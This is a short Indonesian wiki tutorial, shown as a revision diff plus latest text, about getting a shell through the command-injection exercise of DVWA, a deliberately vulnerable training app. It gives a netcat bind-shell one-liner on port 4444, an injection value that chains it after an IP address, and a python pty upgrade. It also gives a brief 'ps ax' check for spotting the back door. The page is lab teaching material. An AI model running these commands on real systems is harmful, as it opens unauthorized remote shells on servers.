DVWA: Command Injection Back Door: Difference between revisions
From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs) No edit summary |
|||
| (2 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
Backdoor menggunakan perintah | Backdoor pada port 4444 menggunakan perintah | ||
mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe | |||
Dari command injection di DVWA masukan | Dari command injection di DVWA masukan | ||
| Line 15: | Line 15: | ||
cat <namafile> | cat <namafile> | ||
dsb | dsb | ||
==Ujicoba== | |||
Percobaan untuk memperoleh shell | Percobaan untuk memperoleh shell | ||
| Line 20: | Line 22: | ||
python -c 'import pty; pty.spawn("/bin/sh")' | python -c 'import pty; pty.spawn("/bin/sh")' | ||
==Cek Operasional Back Door== | |||
Di sisi server, dapat mencek adanya back door dengan | |||
ps ax | |||
nanti akan kelihatan mkfifo dkk | |||
==Pranala Menarik== | ==Pranala Menarik== | ||
* [[DVWA]] | * [[DVWA]] | ||
* [[mkfifo]] | |||
Latest revision as of 07:33, 30 August 2024
Backdoor pada port 4444 menggunakan perintah
mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dari command injection di DVWA masukan
192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
dimana 192.168.43.1 adalah salah satu IP mesin di jaringan
Selanjutnya kita bisa memasukan perintah2 shell seperti
ls cd /etc cat <namafile> dsb
Ujicoba
Percobaan untuk memperoleh shell
python -c 'import pty; pty.spawn("/bin/sh")'
Cek Operasional Back Door
Di sisi server, dapat mencek adanya back door dengan
ps ax
nanti akan kelihatan mkfifo dkk
